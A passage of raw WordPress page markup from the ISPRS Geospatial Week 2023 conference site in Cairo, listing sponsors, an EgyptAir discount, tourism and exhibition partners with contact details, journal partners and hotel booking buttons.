#000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button 